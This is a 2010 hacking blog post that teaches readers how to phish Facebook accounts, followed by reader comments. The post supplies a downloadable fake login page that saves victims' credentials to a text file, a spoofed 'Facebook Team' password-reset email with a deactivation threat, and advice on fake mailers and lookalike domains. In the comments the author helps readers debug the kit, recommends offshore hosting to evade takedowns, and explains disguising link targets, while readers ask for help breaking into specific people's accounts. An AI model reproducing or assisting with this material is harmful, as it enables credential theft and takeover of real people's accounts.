Sunday, August 1, 2010

Art Of Hacking [Exposed] ! - Web Based Hacking[1]:Phishing

Hi there,
  So as I said, I'm here to continue with EXPANDED explanations for each of the techniques used in web based hacking.
Again, just to remind you that *I don't take responsibility for what you do with this information, so don't misuse it*

So it's phishing. There are several ways of phishing, but the easiest and most common is using fake login pages. So let's go on with it first:

[i] Fake Login Pages:

--Phishing a facebook account

Requirements:
         *Fake FB Login page
         *Web host
         *Fake Mailer
         *Creativity
      
1) Creating the fake fb page:
  For this I have made a page for you so you need not waste time on it, but making it yourself will satisfy you :)
So the tech behind this is to COPY the LOGIN PAGE exactly and then simply change the login button action to log the entered email and pwd. In the version I made, it logs them to log.txt and redirects the user to the real login page of Facebook, so no suspicions :)!

http://d01.megashares.com/dl/a8OL7s5/fbFake.zip

 OK, you have it now, what next?

2) The web host
 Now you need to upload this fake login page to a web host so that you can direct your target to it. You can use any host with PHP support, and even 10 MB of space is enough. Make sure it's ad-free. So you have now uploaded it!

How does it look after uploading?

OK, that seems real, but MAJOR PROB: the URL. It's not facebook but zoscio something (don't worry, that's our social site). So we have to have a solution for it: use that friend of ours, the secondary domain (it's good if you can afford a top-level one).
You can use something like faceboook.co.nr or something,
but I used a different technique so that a secondary domain is not needed at all!

3) Fake Mailer
Now you need to send mail as another guy. So what to do? You can use a fake mailing service.
mine : Here

But keep in mind that mail sent from this goes directly into the spam box in most cases because the host is not certified. There's a way of sending the genuine thing that I cannot write here (of course it needs a separate manual on making your own email server),
so that part is up to you!

4) Creativity

NOW everything's OK, but where's da mail to send??
Here it is: send the mail like this

Recep:
From: noreply@facebook.com
From Name: Facebook
Subject: Invalid Password Reset Request

Body:
(I wrote this in HTML, so you have to retranslate it to HTML, cuz Blogger is translating my HTML into the real thing :S :D)




Hey Manujith,


A password reset request has been recently made from your account.
It has been identified as an invalid attempt so that your password reset will not be proceeded until you follow the following link.



https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1




Please read this carefully:
If you have not requested the password reset above, its likely to be a failed attempt by another person to access your account. So please visit the following link and confirm this as an invalid request.



https://login.facebook.com/cancelreq?10012143

No response with in 2 weeks of receiving this email would deactivate your Facebook account temporally for security reason.
https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1


Thanks,
The Facebook Team

Here's the preview when everything's done,


So that's it: the user clicks any link, goes to our FAKE page and logs in there.
AURAAA we get the PWD :D

So I'll upload the fake pages for other email apps (like gmail, hotmail) later.
Soo guyz, I'll be back with another tut.
Till then, Happy Hacking!

55 comments:

  1. hey..thanks for those informations...seems it will work..the problem is i cant download the FAKE FB PAGE that u given as a link.please help me.

  2. Thanks for the info. But the links don't work can you fix them

  3. information is awesome...but d links are not working dude/babes....plz fix em

  4. heyy guys
    links okay now
    the login file link has some probs
    please read the instruction below it :D

  5. help!!!
    i just made the webhost thing with zoka.cc but i don't know how to link the fake facebook folder i downloaded with it :(
    im reaaaaaal confused :(

  6. never mind i worked it out and i did it on my sister as a test but don't know where to find the password :S

  7. oi in dis url : http://zoscio.orgfree.com/
    'Warning: Suspected phishing site!
    The website at zoscio.orgfree.com has been reported as a “phishing” site. Phishing sites trick users into disclosing personal or financial information, often by pretending to represent trusted institutions, such as bank' msg is cmin

  8. HELP ME PLEASE :(

    I am having a lot of difficulties setting this up, my free hosting site just keeps giving an error like:

    "Internet explorer has found the site, but cannot connect, you may have to login (error http 403"

    Please help, do u know of any servers I can use for free, as my future wife is cheating I am sure, but I need evidence before it's too late :(

    kiryrageb@gmail.com

  9. sorry guys for the late reply

    @rebel
    you'll find your passwords in the log.txt in your root directory

    @kiryrageb

    403 is an access problem
    you should change your host, try freezoka.net or zoka.cc both are very good

    But if you guys need phishing page for a long time, then you should look for Offshore hosting sites because by some chance, someone can report about your site.

    Replies
    1. helppp, not getting any fake page on the given link, then how to download it?

  10. Hi,

    When I try to send the e-mail, it sends me this message

    Unable to Send mail. There are other reasons why mail may not be delivered. Sorry - it's hard to be perfect with this sort of thing! -Abhishek
    Go Back.

    Also, how do I link up the downloaded facebook folder to the webhost?

  11. "Hi, I Saw Your Link in Bing.com I Love Your Blogs Kindly See my Link Here a New Alternative Money Making Network alternative to adbrite here

    "

  12. @Anynomous
    I'm really sorry but lately the host i'm using has blocked the mail() function, i'll try updating the link
    by the time you can easily find an alternative by googling "fake mailers"

    And to put the files in your host, use FTP, in your web hosting control panel you will see something like "online FTP" and from that you can upload the zip file itself and then unzip it in the host

    @Asha
    Thank you :D and yup your blog seems really informative as well :D

  13. Hi, I Saw Your Link in Bing.com I Love Your Blogs Kindly See my Link Here a New Alternative Money Making Network alternative to adbrite here

  14. Hi, just a question:
    How'd u make the links appear as:
    https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1

    while they actually lead to somewhere else?

  15. what offshore hosting can you recommend? your response is appreciated.:)

  16. Q1: you need a bit of HTML
    ex: if you need http://google.com to go to
    http://hacker.com
    you do like,
    http://google.com
    this is called anchoring in html

    Q2: i haven't used any service to recommend
    but http://www.securehost.com/, http://www.ccihosting.com/linux-servers.php?_kk=offshore%20hosting&_kt=25c859ce-9ef6-4fd6-9ba8-2c929d37070f&gclid=CNHv-q2UwqkCFYpA4Qod5goaEQ

    have good rating :D

  17. sorry about the above post
    but i cannot post the source as i wish because of blogger limitations

    google for anchor tags for Q1

    Replies
    1. please help me to hack account fb??? Pleaseee

  18. The live demo no longer works as it is reported as Phishing site
    very sorry guyz

  19. ManZzup - I just saw your blog here and I wanted to try it. So you are saying it won't work anymore at all. Can you help me?
    I did download the *Fake FB Login page.
    Please help me.

  20. once you download the fake login page, make a website and upload the stuff directly into it
    the demo is not working but
    http://facbook.zoka.cc/
    would act as a demo for now :)

    Replies
    1. How to download the fake login page? This is not showing anything :(

    2. the link is kinda broken since most hosts keep removing it :S

  21. Email me justinwoodson80@yahoo.com

  22. Waw! good thing bro : )
    was having one problem.. I made a fake login page and imported it to a website.. and did a demo inserting email address and a password.. Then where am i supposed to see where the inserted password and email is stored in my web??

  23. well i used x9x.net for the free webhosting

  24. yup, you will get a file like log.txt which contains the email address followed by the password

    but be careful with your web site policy cause they can ban the demo page ;)

  25. You replied really late ManZzup : p
    I am still confused... where can i meet you in msn, facebook??
    Please check your mail asap! i've mailed you..

  26. Hey I seriously need help with all these steps my email address is qutpie1084@yahoo.com

  27. hey manzzup can you email me and help me out with this. angus_gameover@hotmail.com

  28. guys here please add me up on facebook or at least twitter and put up a message because my mailbox is truly a spam box so i'm not watching it much ::)

  29. How can I contact you on Facebook? how do I find you?

  30. And what if I don't know the person's email? but they do have their facebook..?

  31. facebook.com/manzzup
    well in that case, you will first make the person give his email to you [the easy way]
    or you could still do this in the chat, i mean you just have to change the layout of the phishing page to some other and make sure the guy login to his facebook account from your site

  32. urgh! anyway you could do this for me..LOST
    ciao847@yahoo.com

  33. Would this trick (fake page) work on mobile devices?

  34. yeah it will work if the page is designed correctly

  35. thanks for reply!
    I don't have his email id.. but do have his username?
    what do i do?

  36. well you can get a different approach
    ex: a survey page that need to sign in with fb id
    the same theory is behind, catching the target is all about your creativity :D

  37. HEY HACK THIS ACCOUNT FOR ME PLZ I NEED THE PASSWORD IM LOST DOING ALL THIS HACKING STUFF HELP PLZ

    tarikstephenson@gmail.com

  38. i also tried adding you on facebook this is the person email

    tarikstephenson@gmail.com

    email it to me plz

    WastedKid101@gmail.com

  39. you are amazing,,i added you on facebook =]

  40. Please save my life, someone is blackmailing me with the messages I sent, I don't wanna make my parents sick by the messages as a person cheated on me and this message is all about it. Also it is being forwarded. I just need to delete only my messages, and facebook doesn't allow people to do so even after deleting own account forever. And so I need to hack the account just to delete only these, not gonna do any illegal thing. Also the email addresses are hidden, so I don't know any email address or password, just know their facebook name which is searchable. Pls help me step by step and save my life.

  41. Manzzup, also I don't have enough time, I have to do it within 2-4days, please help mee

  42. Please save my life, someone is blackmailing me with the messages I sent, I don't wanna make my parents sick by the messages as a person cheated on me and this message is all about it. Also it is being forwarded. I just need to delete only my messages, and facebook doesn't allow people to do so even after deleting own account forever. And so I need to hack the account just to delete only these, not gonna do any illegal thing. Also the email addresses are hidden, so I don't know any email address or password, just know their facebook name which is searchable. Pls help me step by step and save my life. Manzzup, also I don't have enough time, I have to do it within 2-4days, please help mee

  43. @lara thankxx i added ya
    @anonymous
    sorry guys ive been off da machine for some days
    ill check the broken links and update quickly
    @sorrow
    well i can help to guide you through the steps
    but remember this isn't a very feasible method to get result in a short time
    there's always a chance but erm it does work often :)

  44. ALL links except the live demo is updated
    i will put up the demo ASA i found a host that allows the stuff :S

  45. Hey manzzup im having a problem that passwords and email addresses are not shown in log.txt plz help me!!!!!

  46. did you CHMOD the log.txt to 777 first?
    most servers don't allow the file to be written unless the necessary permissions are given

  47. HI, I uploaded all the file to a web host that I am using. And I tested the page with my own account, but I couldn't find the log in information (User name and password) in the log.txt file.

  48. possible reason is that you didnt give the necessary write permissions to the file
    from your ftp software right click the log.txt and select CHMOD [it might be under properties] and put the value to 777 and update

  49. If i give you the email of the person i want the password for could you do it for me please and give me the password? I cant seem to set it up at all and i really need this persons password, could you help me please?
